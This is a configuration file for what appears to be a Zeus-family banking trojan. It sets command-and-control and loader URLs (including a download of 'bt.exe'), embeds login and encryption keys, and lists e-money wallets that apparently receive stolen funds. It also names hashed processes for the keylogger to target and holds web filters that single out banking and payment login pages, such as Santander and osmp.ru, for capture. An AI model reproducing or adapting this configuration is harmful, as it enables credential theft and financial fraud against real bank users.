;Build time:   21:14:54 16.11.2012 GMT
;Version:      2.0.9.4

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 30 30
  timer_logs 30 30
  timer_stats 30 30
  url_config "http://site.ru/file.php|cookies1.tmp"
  login_key "5E0D8B0A1FA3AE9146BCD092E58A316E"
  encryption_key "KpXmrpM25CRthyAGzr8zaqrmEWWmVh93lolsdhgsdfhg1sdS214"
  remove_certs 1
  disable_tcpserver 0
end

entry "DynamicConfig"
  url_loader "http://site.ru/file.php|bt.exe"
  url_server "http://site.ru/lilwaynebio.php"
  z_purse "Z164518982661"
  r_purse "R288279911772"
  lr_purse "U0627342"
  yad_purse "410011669479030"
  qiwi_purse "9512618643"
  perf_g "G2345678"
  perf_e "E2345678"
  rbk_purse "RU12345678"
  file_webinjects "webinjects_last.txt"
  entry "AdvancedConfigs"
    ;"http://advdomain/cfg1.bin"
  end
  entry "KeyLogger"
     "0x321ECF12"
     "0xA90AF7A3"
     "0xFE0E05F6"
     "0x551EC3F3"
     "0x4B30B908"
     "0x4C3698BC"
     "0x7766F336"
     "0xB5D97F73"
     "0xAF94E063"
     "0xA906B3A3"
     "0x591CFB21"
     "0x355CF70A"
     "0x1C1A4917"
     "0x3C525620"
     "0x133CF0E3"
     "0x2143F9E9"
     "0x5D430DD7"
     "0xD81CDFBE"
     "0x4221943F"
     "0x5938F71A"
     "0x122354A9"
     "0x401AD638"
     "0x9975E27D"
     "0x401ACF78"
     "0x7600821E"
     "0xC14E8364"
     "0x26613112"
     "0xCF148D20"
     "0xCB38E79E"
     "0x4A5E77CB"
     "0x210FD341"
     "0x0112B70A"
     "0x4B315A48"
     "0xB5D8F713"
     "0xB51CFB13"
     "0x3608EB32"
     "0x4404D1CF"
     "0xC12DF30"
     "0x39360BAB"
     "0x112B70A"
     "0x5008D447"
     "0x351CF70A"
     "0x4B30AB34"
     "0x4628EF1B"
     "0x10F60DB"
     "0x44049484"
     "0xD532FBF3"
     "0x25D8F303"
     "0xA904F7A3"
     "0xA91ED660"
     "0x142CE1F1"
     "0x581CFB25"
     "0xAF78D6C9"
     "0x5A3E8351"
     "0x25D97F3B"
     "0xEC0AB1AF"
  end
  entry "WebFilters"
    "!*.microsoft.com/*"
    "!http://*myspace.com*"
    "https://www.gruposantander.es/*"
    "!http://*odnoklassniki.ru/*"
    "!http://vkontakte.ru/*"
    "@*/login.osmp.ru/*"
    "@*/atl.osmp.ru/*"
  end
  entry "WebDataFilters"
    ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
  end
end
